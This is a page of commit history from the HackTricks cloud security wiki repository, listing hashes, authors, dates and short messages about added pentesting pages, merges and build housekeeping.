Compare commits

..

618 Commits

Author SHA1 Message Date
carlospolop
675092de06 Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-10-01 11:37:16 +02:00
carlospolop
570c0f46af fix searchindex 2025-10-01 11:37:13 +02:00
Build master
2468851007 Update searchindex (purged history; keep current) 2025-09-30 22:08:01 +00:00
carlospolop
d0ebc37eb3 Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-10-01 00:04:05 +02:00
carlospolop
79fd264473 Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-10-01 00:04:05 +02:00
carlospolop
becec234f4 f 2025-09-30 23:46:30 +02:00
carlospolop
143e6bdfe9 f 2025-09-30 23:46:30 +02:00
carlospolop
2a5d2dea9e Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-09-30 23:45:47 +02:00
carlospolop
9b52c7953d Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-09-30 23:45:47 +02:00
Build master
07628e009a Update searchindex (purged history; keep current) 2025-09-30 19:15:32 +00:00
SirBroccoli
8d39c38b58 Merge pull request #216 from HackTricks-wiki/update_Cooking_an_SQL_Injection_Vulnerability_in_Chef_Aut_20250930_182633
Cooking an SQL Injection Vulnerability in Chef Automate
2025-09-30 21:13:40 +02:00
SirBroccoli
7097f55620 Update SUMMARY.md 2025-09-30 21:13:20 +02:00
SirBroccoli
f96fed548e Merge pull request #215 from JaimePolop/master
Roles Anywhere explanation
2025-09-30 21:11:45 +02:00
HackTricks News Bot
21b31a3be3 Add content from: Cooking an SQL Injection Vulnerability in Chef Automate
- Remove searchindex.js (auto-generated file)
2025-09-30 18:28:35 +00:00
JaimePolop
5d031d4518 Roles Anywhere explanation 2025-09-30 17:50:02 +02:00
SirBroccoli
1e51bb702d Merge pull request #210 from HackTricks-wiki/update_Forgotten_20250917_063108
Forgotten
2025-09-30 01:24:53 +02:00
SirBroccoli
1111212cbb Update attacking-kubernetes-from-inside-a-pod.md 2025-09-30 01:07:36 +02:00
SirBroccoli
bb763109dc Merge pull request #209 from HackTricks-wiki/update_GitHub_Actions__A_Cloudy_Day_for_Security_-_Part_2_20250915_124429
GitHub Actions A Cloudy Day for Security - Part 2
2025-09-30 01:05:33 +02:00
SirBroccoli
25af34d5a2 Merge pull request #208 from HackTricks-wiki/update_Building_Hacker_Communities__Bug_Bounty_Village__g_20250915_123837
Building Hacker Communities Bug Bounty Village, getDisclosed...
2025-09-30 00:57:56 +02:00
carlospolop
a10148e331 f 2025-09-30 00:54:25 +02:00
carlospolop
b904273a19 f 2025-09-30 00:54:25 +02:00
carlospolop
0aa87b8319 f 2025-09-30 00:53:25 +02:00
carlospolop
004e341804 f 2025-09-30 00:53:25 +02:00
Build master
24c1d54861 Update searchindex (purged history; keep current) 2025-09-29 22:46:56 +00:00
carlospolop
015b24f51c Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-09-30 00:40:54 +02:00
carlospolop
8589cf621f Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-09-30 00:40:54 +02:00
carlospolop
c8957b9107 f 2025-09-30 00:39:12 +02:00
carlospolop
ecebe97de5 f 2025-09-30 00:39:12 +02:00
Build master
fe691c5c50 Update searchindex (purged history; keep current) 2025-09-29 22:31:25 +00:00
SirBroccoli
de064b1b68 Merge pull request #214 from JaimePolop/master
GetFederatedToken & IAM Roles Anywhere Privesc
2025-09-30 00:23:32 +02:00
SirBroccoli
ea0f667e57 Merge pull request #214 from JaimePolop/master
GetFederatedToken & IAM Roles Anywhere Privesc
2025-09-30 00:23:32 +02:00
SirBroccoli
b7a1554deb Delete searchindex.js 2025-09-30 00:23:17 +02:00
Build master
1304799271 Update searchindex (purged history; keep current) 2025-09-29 21:35:54 +00:00
carlospolop
18e756320d Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-09-29 23:30:37 +02:00
SirBroccoli
78767e199c Merge pull request #207 from HackTricks-wiki/update_GitHub_Actions__A_Cloudy_Day_for_Security_-_Part_1_20250909_013245
GitHub Actions A Cloudy Day for Security - Part 1
2025-09-29 23:05:37 +02:00
SirBroccoli
65816a9798 Merge pull request #206 from HackTricks-wiki/update_Model_Namespace_Reuse__An_AI_Supply-Chain_Attack_E_20250904_125657
Model Namespace Reuse An AI Supply-Chain Attack Exploiting M...
2025-09-29 23:04:02 +02:00
SirBroccoli
fc5e23269c Update pentesting-cloud-methodology.md 2025-09-29 23:03:41 +02:00
SirBroccoli
89a2ab54ae Update pentesting-cloud-methodology.md 2025-09-29 23:03:04 +02:00
JaimePolop
f3afa739ad Roles Anywhere explanation 2025-09-29 22:53:29 +02:00
JaimePolop
d11f3a3880 Roles Anywhere explanation 2025-09-29 22:53:29 +02:00
JaimePolop
590e54ea9e stsgetfederatedtoken 2025-09-29 17:15:59 +02:00
JaimePolop
f539a9e2d9 stsgetfederatedtoken 2025-09-29 17:15:59 +02:00
JaimePolop
e153dc47b0 stsgetfederatedtoken 2025-09-29 17:14:00 +02:00
JaimePolop
9242d2e4d9 stsgetfederatedtoken 2025-09-29 17:14:00 +02:00
HackTricks News Bot
37b03b3517 Add content from: Forgotten
- Remove searchindex.js (auto-generated file)
2025-09-17 06:34:24 +00:00
HackTricks News Bot
a6491998d2 Add content from: GitHub Actions: A Cloudy Day for Security - Part 2
- Remove searchindex.js (auto-generated file)
2025-09-15 12:47:04 +00:00
HackTricks News Bot
dba44c006e Add content from: Building Hacker Communities: Bug Bounty Village, getDisclose...
- Remove searchindex.js (auto-generated file)
2025-09-15 12:43:09 +00:00
HackTricks News Bot
b9b20e4567 Add content from: GitHub Actions: A Cloudy Day for Security - Part 1
- Remove searchindex.js (auto-generated file)
2025-09-09 01:35:49 +00:00
Build master
391b11e92c Update searchindex (purged history; keep current) 2025-09-05 10:54:39 +00:00
carlospolop
19024e5a7c f 2025-09-05 12:50:45 +02:00
carlospolop
4d9445d2bb f 2025-09-05 12:49:02 +02:00
carlospolop
7f435558c4 Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-09-05 01:35:13 +02:00
carlospolop
a7ce58fa25 tf 2025-09-05 01:34:02 +02:00
HackTricks News Bot
5b5e339f96 Add content from: Model Namespace Reuse: An AI Supply-Chain Attack Exploiting ...
- Remove searchindex.js (auto-generated file)
2025-09-04 13:00:46 +00:00
SirBroccoli
5bd2aafc8e Merge pull request #204 from HackTricks-wiki/update_Gitblit_CVE-2024-28080__SSH_public_key_fallback_to_20250829_182811
Gitblit CVE-2024-28080 SSH public‑key fallback to password a...
2025-08-31 10:17:05 +02:00
SirBroccoli
00730ca794 Add Gitblit Security section to SUMMARY.md 2025-08-31 10:16:44 +02:00
SirBroccoli
923f510164 Refactor pentesting CI/CD methodology document
Removed redundant sections on CI/CD pipelines and VCS pentesting methodology. Updated references and streamlined content for clarity.
2025-08-31 10:15:04 +02:00
SirBroccoli
fec9bfb986 Update pentesting-ci-cd-methodology.md 2025-08-31 10:12:16 +02:00
SirBroccoli
6a11053885 Remove CVE-2024-28080 details from documentation
Removed detailed explanation of CVE-2024-28080, including summary, root cause, exploitation steps, impact, detection ideas, and mitigations.
2025-08-31 10:11:39 +02:00
SirBroccoli
de46109976 Merge pull request #205 from Fake1Sback/ecs-run-task-privesc-details
ecs run-task privesc method as a separate section
2025-08-31 10:06:39 +02:00
SirBroccoli
fd19dc2304 Update aws-ecs-privesc.md 2025-08-31 10:06:24 +02:00
Fake1Sback
599d45c50a Added a separate section about the ecs run-task privesc method, since it was only briefly mentioned in the iam:PassRole, (ecs:UpdateService|ecs:CreateService) section 2025-08-30 18:52:59 +03:00
HackTricks News Bot
5b2a228050 Add content from: Gitblit CVE-2024-28080: SSH public‑key fallback to password ...
- Remove searchindex.js (auto-generated file)
2025-08-29 18:31:33 +00:00
carlospolop
d1f95b1929 a 2025-08-29 12:01:44 +02:00
carlospolop
846ad61b73 f 2025-08-29 12:01:07 +02:00
carlospolop
c09016a56f Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-08-29 11:47:04 +02:00
carlospolop
77b76bfb00 a 2025-08-29 11:45:00 +02:00
carlospolop
3883d1a74e clean 2025-08-29 11:42:28 +02:00
carlospolop
ebb51f81bb f 2025-08-29 10:31:31 +02:00
carlospolop
d761716a28 f 2025-08-28 19:51:53 +02:00
carlospolop
467491e1ae f 2025-08-26 11:30:37 +02:00
carlospolop
d05d94d995 f 2025-08-25 23:20:13 +02:00
carlospolop
bc1201eb61 Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-08-24 13:22:13 +02:00
carlospolop
15ff9a7d1c f 2025-08-24 13:22:10 +02:00
SirBroccoli
4880cb4574 Update translator.py 2025-08-22 18:06:33 +02:00
SirBroccoli
05853fcc19 Update translator.py 2025-08-22 12:10:49 +02:00
carlospolop
a45973b8a7 f 2025-08-21 02:29:00 +02:00
carlospolop
38dae42b81 Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-08-21 02:26:30 +02:00
carlospolop
5adcd244f6 f 2025-08-21 02:26:27 +02:00
SirBroccoli
33ca677b86 Update README.md 2025-08-21 02:19:10 +02:00
carlospolop
b1af5ce692 Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-08-21 02:18:41 +02:00
carlospolop
61ae9f83db f 2025-08-21 02:18:38 +02:00
SirBroccoli
07a16af4ec Update README.md 2025-08-21 02:12:04 +02:00
carlospolop
f45429555e Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-08-21 02:11:47 +02:00
carlospolop
f92d67cfdc f 2025-08-21 02:11:44 +02:00
SirBroccoli
d7c57cba6e Update accessible-deleted-data-in-github.md 2025-08-21 02:05:51 +02:00
SirBroccoli
a641fcea8a Update README.md 2025-08-21 02:05:31 +02:00
SirBroccoli
eb4f46f714 Update README.md 2025-08-21 02:05:02 +02:00
SirBroccoli
1ceeca1326 Update README.md 2025-08-21 02:04:37 +02:00
carlospolop
68267218a7 f 2025-08-21 02:04:24 +02:00
carlospolop
3901748f3d Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-08-21 02:03:39 +02:00
carlospolop
68de9f8acc f 2025-08-21 02:03:37 +02:00
SirBroccoli
236a8a2cec Update README.md 2025-08-21 01:59:20 +02:00
carlospolop
d373f62166 Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-08-21 01:59:00 +02:00
carlospolop
c2c232fd46 f 2025-08-21 01:58:58 +02:00
SirBroccoli
f3fd4b9294 Update README.md 2025-08-21 01:56:10 +02:00
SirBroccoli
dd2c5af442 Merge pull request #198 from HackTricks-wiki/update_How_we_exploited_CodeRabbit__from_a_simple_PR_to_R_20250819_183743
How we exploited CodeRabbit from a simple PR to RCE and writ...
2025-08-21 01:52:41 +02:00
carlospolop
ee4da87049 improve workflows 2025-08-21 01:51:45 +02:00
carlospolop
3b1f434a66 f 2025-08-21 01:07:22 +02:00
carlospolop
8db7266efb f 2025-08-21 00:40:51 +02:00
carlospolop
59437b9b32 Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-08-21 00:23:53 +02:00
carlospolop
ea3041d9a2 fix refs 2025-08-21 00:23:50 +02:00
HackTricks News Bot
f171d1a97d Add content from: How we exploited CodeRabbit: from a simple PR to RCE and wri... 2025-08-19 18:40:49 +00:00
SirBroccoli
855ef5fd9e Merge pull request #197 from HackTricks-wiki/update_Terraform_Cloud_token_abuse_turns_speculative_plan_20250815_124146
Terraform Cloud token abuse turns speculative plan into remo...
2025-08-19 17:22:17 +02:00
SirBroccoli
3ff0c8a86f Update terraform-security.md 2025-08-19 17:22:04 +02:00
carlospolop
414eeda035 Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-08-18 16:51:47 +02:00
carlospolop
dac7b0f906 fix? 2025-08-18 16:51:43 +02:00
SirBroccoli
3b456ebc2e Merge pull request #195 from HackTricks-wiki/update_How_to_transfer_files_in_AWS_using_SSM_20250806_013457
How to transfer files in AWS using SSM
2025-08-18 16:48:47 +02:00
SirBroccoli
f0df70528a Update README.md 2025-08-18 16:48:30 +02:00
SirBroccoli
f705477774 Merge pull request #193 from hasshido/master
grte-mightocho
2025-08-18 16:37:29 +02:00
carlospolop
aff8ab0252 Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-08-18 16:36:42 +02:00
carlospolop
06b577d42f f 2025-08-18 16:36:38 +02:00
SirBroccoli
14e986b2a7 Merge pull request #196 from lambdasawa/master
grte-lambdasawa
2025-08-18 16:06:12 +02:00
SirBroccoli
581f09f904 Merge pull request #194 from afaq1337/patch-1
arte-afaq
2025-08-18 16:05:08 +02:00
HackTricks News Bot
c76cc24a59 Add content from: Terraform Cloud token abuse turns speculative plan into remo... 2025-08-15 12:46:29 +00:00
Tsubasa Irisawa
15bde67918 Add GCP Cloud Tasks privesc page 2025-08-14 23:47:19 +09:00
HackTricks News Bot
3f16d3c5f3 Add content from: How to transfer files in AWS using SSM 2025-08-06 01:38:30 +00:00
afaq
82a44ea4c0 Updated Cognito Identity CLI Command Format
Replaced outdated key=value syntax with JSON-based in "--logins" format, keeping the old format for preserved legacy.
2025-08-04 23:56:55 +05:00
hasshido
839f139795 Merge branch 'HackTricks-wiki:master' into master 2025-08-04 12:41:01 +02:00
carlospolop
b82a88252c f 2025-08-04 11:37:34 +02:00
carlospolop
c3cfb95b87 f 2025-08-04 11:29:20 +02:00
carlospolop
e0b92e3b7a f 2025-08-01 12:04:42 +02:00
SirBroccoli
f521c0d95a Merge pull request #192 from HackTricks-wiki/update_AnsibleHound___BloodHound_Collector_for_Ansible_Wo_20250801_015104
AnsibleHound – BloodHound Collector for Ansible WorX and Tow...
2025-08-01 11:55:14 +02:00
SirBroccoli
96b0de9ec9 Update kubernetes-basics.md 2025-08-01 11:53:55 +02:00
SirBroccoli
6b96bae348 Update README.md 2025-08-01 11:53:20 +02:00
SirBroccoli
5fd9ed5048 Update gcp-add-custom-ssh-metadata.md 2025-08-01 11:52:52 +02:00
SirBroccoli
3157069bde Update az-static-web-apps.md 2025-08-01 11:51:49 +02:00
SirBroccoli
ccd50a451d Update eventbridgescheduler-enum.md 2025-08-01 11:50:45 +02:00
SirBroccoli
0a1f3dea22 Update aws-ecr-enum.md 2025-08-01 11:50:28 +02:00
SirBroccoli
e1bc13c19c Update aws-waf-enum.md 2025-08-01 11:49:21 +02:00
SirBroccoli
58c7ae8399 Update aws-trusted-advisor-enum.md 2025-08-01 11:49:00 +02:00
SirBroccoli
0ba0d247a8 Update aws-inspector-enum.md 2025-08-01 11:48:43 +02:00
SirBroccoli
6f8738f34f Update aws-sagemaker-persistence.md 2025-08-01 11:47:18 +02:00
SirBroccoli
5a6cd9a85c Merge pull request #191 from lambdasawa/master
arte-lambdasawa
2025-08-01 11:43:36 +02:00
HackTricks News Bot
ed2ae1e58f Add content from: AnsibleHound – BloodHound Collector for Ansible WorX and Tow... 2025-08-01 01:52:00 +00:00
Tsubasa Irisawa
dbe2969386 Add AWS AppRunner privesc page 2025-08-01 10:09:11 +09:00
carlospolop
97759b6cec rm discount 2025-07-31 11:58:39 +02:00
hasshido
95f380db6b Update gcp-cloudbuild-privesc.md removing cloudbuild.builds.update
### `cloudbuild.builds.update`

Currently this permission is listed to **only** be able to be used to use the api method `builds.cancel()` which cannot be abused to change the parameters of an ongoing build

References:
- https://cloud.google.com/build/docs/iam-roles-permissions#permissions
- https://cloud.google.com/build/docs/api/reference/rest/v1/projects.builds/cancel
2025-07-30 21:13:32 +02:00
hasshido
65da889db0 Update cloudbuild.builds.create exploitation method
Includes direct gcloud command descriptioon to exploit this permission.
2025-07-30 21:00:52 +02:00
carlospolop
45a7b74a0f f 2025-07-30 12:39:44 +02:00
carlospolop
4d2fa75b55 f 2025-07-30 06:52:07 +02:00
carlospolop
84bc28f8bb f 2025-07-30 06:48:21 +02:00
carlospolop
ebd15ccb63 f 2025-07-30 06:27:12 +02:00
carlospolop
f72768b30f fix 2025-07-30 06:18:20 +02:00
carlospolop
7a92891381 fix 2025-07-30 06:14:13 +02:00
carlospolop
e98c16371b fix 2025-07-30 06:05:19 +02:00
carlospolop
b1b0b0c536 impr 2025-07-30 05:57:20 +02:00
carlospolop
e324b93d88 improvements 2025-07-29 17:56:43 +02:00
carlospolop
baff049eb8 improvements 2025-07-24 13:23:56 +02:00
carlospolop
46a8364006 ssm 2025-07-24 08:53:00 +02:00
SirBroccoli
ce9f3f87af Merge pull request #190 from vishnuraju/master
arte-dh4wk
2025-07-24 08:48:14 +02:00
carlospolop
8655bc665f improvements 2025-07-24 00:04:54 +02:00
carlospolop
26022c0005 Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-07-22 20:58:28 +02:00
carlospolop
a315ad9465 update 2025-07-22 20:58:25 +02:00
SirBroccoli
26d6010bfd Merge pull request #189 from AI-redteam/sagemaker_persistence
arte-bstevens
2025-07-22 14:26:58 +02:00
vishnuraju
d613dc8ce7 adding create-association for persistence 2025-07-19 15:56:47 +05:30
carlospolop
e93215546e impr 2025-07-18 14:59:34 +02:00
carlospolop
b4bb813717 improve translator 2025-07-18 14:59:11 +02:00
carlospolop
ab12e74c5e Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-07-16 15:45:31 +02:00
carlospolop
55658adf68 atlantis 2025-07-16 15:45:27 +02:00
SirBroccoli
e10e318840 Update ai.js 2025-07-16 11:23:46 +02:00
Ben
3662845c9c Update aws-sagemaker-persistence.md 2025-07-15 17:07:58 -05:00
Ben
7b475f151e Update aws-sagemaker-persistence.md 2025-07-15 17:01:04 -05:00
Ben
cfacf65682 Create aws-sagemaker-persistence.md 2025-07-15 16:46:25 -05:00
carlospolop
cacc26efe4 d 2025-07-15 19:22:04 +02:00
carlospolop
3f6485403c f 2025-07-12 16:21:38 +02:00
carlospolop
ec63e0077a Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-07-07 11:50:03 +02:00
carlospolop
8197352f5b f 2025-07-07 11:49:58 +02:00
SirBroccoli
e75ef47d73 Merge pull request #186 from JaimePolop/patch-24
Update aws-kms-enum.md
2025-07-03 16:51:47 +02:00
Jaime Polop
4c5a2d0b51 Update aws-kms-enum.md 2025-06-27 18:37:04 +02:00
carlospolop
f26eba3574 f 2025-06-25 13:54:52 +02:00
carlospolop
e1a1b2a31f f 2025-06-25 02:19:23 +02:00
carlospolop
d21b704799 a 2025-06-25 01:52:06 +02:00
carlospolop
278e22cf25 UPDATE 2025-06-24 15:59:59 +02:00
SirBroccoli
ba62c1ded8 Merge pull request #183 from sebastian-mora/add-roles-anywhere-privesc
Adding page for IAM Roles Anywhere Privesc
2025-06-24 15:58:25 +02:00
carlospolop
e6af835b2d a 2025-06-24 10:23:30 +02:00
carlospolop
c3110e5dc2 f 2025-06-22 14:53:27 +02:00
carlospolop
c3d732d46b f 2025-06-13 16:19:46 +02:00
carlospolop
16833c8621 a 2025-06-10 14:41:34 +02:00
carlospolop
e004aa173d Check origin GCP project 2025-06-10 14:33:27 +02:00
carlospolop
32d8b32e1f fix 2025-06-08 19:59:16 +02:00
carlospolop
8cb8cf4b78 a 2025-06-07 15:08:20 +02:00
carlospolop
682420bd96 a 2025-05-28 23:34:48 +02:00
carlospolop
423b2f5d24 f name insta 2025-05-20 17:38:13 +02:00
carlospolop
06302efcc4 f 2025-05-20 17:31:11 +02:00
carlospolop
12f8a8240c fix actions 2025-05-20 17:30:59 +02:00
carlospolop
cc8c3b9bc7 f 2025-05-20 17:16:28 +02:00
carlospolop
e3be82da7b a 2025-05-20 08:02:42 +02:00
carlospolop
5c9151d0a9 f 2025-05-20 07:44:49 +02:00
carlospolop
4f8f9ebb5d delepwn 2025-05-17 06:58:24 +02:00
carlospolop
a59586d035 a 2025-05-15 18:55:14 +02:00
carlospolop
6f5f13f1d1 a 2025-05-14 23:46:42 +02:00
carlospolop
d0a10b4b59 Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-05-14 15:49:44 +02:00
carlospolop
3153e9e112 a 2025-05-14 15:49:14 +02:00
seb
4ba5101450 add blog 2025-05-12 23:33:37 -04:00
Ignacio Dominguez
46317efe3f Update az-cloud-shell-persistence.md 2025-05-12 21:23:45 +02:00
carlospolop
13cd85219b a 2025-05-11 17:04:02 +02:00
Carlos Polop
bb4337235e a 2025-05-09 14:53:58 +02:00
Carlos Polop
4adabb8e45 Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-05-09 14:41:10 +02:00
Carlos Polop
64e6b18369 clarification 2025-05-09 14:41:08 +02:00
SirBroccoli
e79a494c75 Merge pull request #180 from MickaelFontes/master
fix: wrong reference link in s3 privesc
2025-05-09 13:45:44 +02:00
SirBroccoli
e8310823ee Merge pull request #182 from reubensammut/master
Update az-automation-accounts-privesc.md
2025-05-09 13:43:18 +02:00
Carlos Polop
94d6bb7be6 apps username 2025-05-09 13:14:54 +02:00
Carlos Polop
3886eb0679 update searcher 2025-05-08 23:14:04 +02:00
Carlos Polop
b4a33ce277 last 2025-05-08 23:10:34 +02:00
Reuben Sammut
b206e184f6 Merge pull request #1 from reubensammut/change-webhook-command
Update az-automation-accounts-privesc.md
2025-05-08 21:35:21 +02:00
Reuben Sammut
1562438890 Update az-automation-accounts-privesc.md
Change the webhook command to use the Powershell command `New-AzAutomationWebHook` which automatically generates the URI, as the command used in here used a URI generated by the Azure Portal
2025-05-08 21:26:25 +02:00
Carlos Polop
9c7ae3465b a 2025-05-05 23:42:52 +02:00
Carlos Polop
afef551baa fix 2025-05-01 16:25:15 +02:00
MickaelFontes
45f06743a5 fix: wrong reference link in s3 privesc 2025-05-01 12:07:35 +00:00
Carlos Polop
2cf7ab9070 a 2025-05-01 13:52:01 +02:00
Carlos Polop
a67f9f67e9 Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-05-01 13:35:45 +02:00
Carlos Polop
b76f4ee32e improvements 2025-05-01 13:35:42 +02:00
SirBroccoli
c57b961d3f Merge pull request #179 from olizimmermann/patch-1
Update aws-s3-unauthenticated-enum.md
2025-04-30 17:29:53 +02:00
SirBroccoli
6a65d520db Merge pull request #178 from courtneyimbert/fix/arte-courtneybell-corrections
arte-courtneybell
2025-04-30 17:28:34 +02:00
Carlos Polop
2d8e6cc317 ai improvements 2025-04-29 10:27:14 +02:00
Carlos Polop
1af7a95753 a 2025-04-28 01:14:18 +02:00
Carlos Polop
81bd25041e typo 2025-04-27 23:46:36 +02:00
Carlos Polop
a2fc1bb9e4 add 2025-04-27 23:34:53 +02:00
Carlos Polop
245801a8f3 a 2025-04-26 13:09:32 +02:00
Carlos Polop
c8ee4e1f63 don't freeze because of searcher 2025-04-26 13:05:26 +02:00
Carlos Polop
87d7a35977 a 2025-04-25 17:53:18 +02:00
Carlos Polop
df415302d4 hacktricks ai 2025-04-25 17:49:40 +02:00
Carlos Polop
227bd60d9d fix postgresql 2025-04-25 04:50:59 +02:00
Oliver Zimmermann
6113778d42 Update aws-s3-unauthenticated-enum.md 2025-04-22 13:57:01 +02:00
Carlos Polop
6229cc5c3f f 2025-04-21 23:00:32 +02:00
Carlos Polop
cc3464f588 fix search 2025-04-21 02:09:17 +02:00
Carlos Polop
84c84de0f6 fix 2025-04-21 01:57:47 +02:00
Carlos Polop
1af5f28379 fix search 2025-04-21 00:17:58 +02:00
Carlos Polop
d22733b802 rm searhcindex.json 2025-04-21 00:14:09 +02:00
Carlos Polop
13e0bddd0c fix local 2025-04-20 02:55:39 +02:00
Courtney Bell
2f1397e2df arte-courtneybell
Added webhook alternative example (tested) to task definition as a new tab
2025-04-19 19:21:52 -04:00
Courtney Bell
a1718ef3d5 arte-courtneybell-corrections
Minor fixes (fix to one command based on testing, 2 typo corrections)
2025-04-19 18:38:14 -04:00
Carlos Polop
c01bb34d34 f 2025-04-18 13:46:59 +02:00
Carlos Polop
57d0f100e5 v 2025-04-18 13:21:17 +02:00
Carlos Polop
9e731ee081 f 2025-04-16 17:36:49 +02:00
Carlos Polop
f37c444854 Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-04-15 01:44:12 +02:00
Carlos Polop
cb0f15bd18 use langs locally 2025-04-15 01:44:09 +02:00
SirBroccoli
05ef9e4e88 Update translator.py 2025-04-15 00:06:14 +02:00
SirBroccoli
653f16bf02 Update translator.py 2025-04-15 00:04:20 +02:00
Carlos Polop
02f3d3d27e add 2025-04-14 23:56:48 +02:00
Carlos Polop
fd7e52a9f0 Update banners 2025-04-14 23:56:08 +02:00
Carlos Polop
a31a609a53 gif 2025-04-14 23:44:49 +02:00
Carlos Polop
2d20c080f1 im 2025-04-13 16:30:15 +02:00
Carlos Polop
a1abf4a40e book 2025-04-13 16:29:58 +02:00
Carlos Polop
3267900f8e action 2025-04-13 16:29:23 +02:00
Carlos Polop
d24b4f4947 Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-04-11 02:23:56 +02:00
Carlos Polop
cb93bc9325 a 2025-04-11 02:23:53 +02:00
SirBroccoli
89bd5603b5 Merge pull request #177 from TheToddLuci0/add_cdk
arte-TheToddLuci0
2025-04-07 03:06:15 +02:00
SirBroccoli
a214e36c16 Merge pull request #175 from TheToddLuci0/add_credential_process
Add `credential_process` info
2025-04-07 03:04:24 +02:00
TheToddLuci0
46fb09dbc7 Add info on CDK 2025-04-03 15:31:19 -05:00
SirBroccoli
c6c5326731 Merge pull request #174 from TheToddLuci0/add_lambda_credential_theft
Add section on lambda credential theft
2025-04-03 22:29:19 +02:00
Carlos Polop
0d99994b28 t 2025-04-03 22:28:06 +02:00
SirBroccoli
518ec63594 Merge pull request #173 from 0x21AD/master
Mindmap PE Common Services
2025-04-03 15:45:50 +02:00
Build master
365ec0ea1b Update searchindex 2025-04-02 15:51:23 +00:00
SirBroccoli
55bb9cabcd Merge pull request #176 from JaimePolop/master
changes
2025-04-02 17:49:38 +02:00
Jimmy
b63860c1b3 changes 2025-04-01 00:12:16 +02:00
Jaime Polop
f396d310ed Merge branch 'HackTricks-wiki:master' into master 2025-03-31 23:26:23 +02:00
TheToddLuci0
fb64ce166d Add instructions for automating temp creds with external process 2025-03-31 14:14:00 -05:00
TheToddLuci0
60fe5b65e9 Add a dedicated post-exploitation section on stealing creds from lambda 2025-03-31 13:49:12 -05:00
SirBroccoli
d6a90112e4 Update upload_ht_to_ai.py 2025-03-31 04:39:18 +02:00
SirBroccoli
8ac043f850 Update upload_ht_to_ai.yml 2025-03-31 04:38:40 +02:00
SirBroccoli
d0ca3b4c13 Update upload_ht_to_ai.py 2025-03-31 04:36:29 +02:00
SirBroccoli
0721cb17a8 Update upload_ht_to_ai.yml 2025-03-31 04:34:21 +02:00
SirBroccoli
0a7aa1d734 Update upload_ht_to_ai.yml 2025-03-31 04:32:23 +02:00
SirBroccoli
f976ae1b70 Update upload_ht_to_ai.yml 2025-03-31 04:30:53 +02:00
SirBroccoli
73895ccc90 Update upload_ht_to_ai.py 2025-03-31 04:30:08 +02:00
SirBroccoli
a0c66139cf Create upload_ht_to_ai.yml 2025-03-31 04:27:09 +02:00
SirBroccoli
6d3e83b6fa Update and rename clean_for_ai.py to upload_ht_to_ai.py 2025-03-31 04:23:34 +02:00
Build master
323213ba74 Update searchindex 2025-03-29 23:01:11 +00:00
Carlos Polop
f87ea41409 Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-03-29 23:55:08 +01:00
Carlos Polop
fa3baebd58 impr 2025-03-29 23:54:50 +01:00
0x21AD
ecb7b8f136 Mindmap PE Common Services 2025-03-29 14:14:44 +02:00
Build master
64bb51ab33 Update searchindex 2025-03-29 08:43:50 +00:00
Carlos Polop
043f28492d Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-03-29 09:42:05 +01:00
Carlos Polop
7136d61e6b f 2025-03-29 09:42:02 +01:00
Build master
aa4d2f583f Update searchindex 2025-03-28 15:53:20 +00:00
Carlos Polop
5276c9c7db Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-03-28 16:51:43 +01:00
Carlos Polop
005dee76e9 more 2025-03-28 16:51:40 +01:00
Build master
954173982d Update searchindex 2025-03-28 11:25:08 +00:00
Carlos Polop
014036afb7 Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-03-28 12:23:25 +01:00
Carlos Polop
ff9846dbc6 a 2025-03-28 12:23:23 +01:00
Build master
5c6a20ff62 Update searchindex 2025-03-28 10:46:54 +00:00
Carlos Polop
524edcbc09 Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-03-28 11:45:18 +01:00
Carlos Polop
8be8f721ca add 2025-03-28 11:45:16 +01:00
Build master
d7937f5851 Update searchindex 2025-03-27 12:44:53 +00:00
SirBroccoli
8cca683281 Merge pull request #172 from kluo84/arte-mr.kluo-UpdateStateMachine
arte-Kluo
2025-03-27 13:43:24 +01:00
kluo
29db46c537 Update aws-stepfunctions-post-exploitation.md 2025-03-26 18:11:05 -05:00
kluo84
35075688aa arte-mr.kluo-UpdateStateMachine 2025-03-26 18:04:29 -05:00
kluo84
49023a7e71 Update more post exploitation for step function 2025-03-24 20:29:40 -05:00
Jaime Polop
ec902048e6 Merge branch 'HackTricks-wiki:master' into master 2025-03-21 11:18:56 +01:00
Carlos Polop
413635f6ed a 2025-03-21 10:26:04 +01:00
Carlos Polop
160cdf0767 Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-03-21 10:20:07 +01:00
Carlos Polop
ce9d8e9162 f 2025-03-21 10:17:18 +01:00
Build master
27bda8c014 Update searchindex 2025-03-21 09:09:36 +00:00
Build master
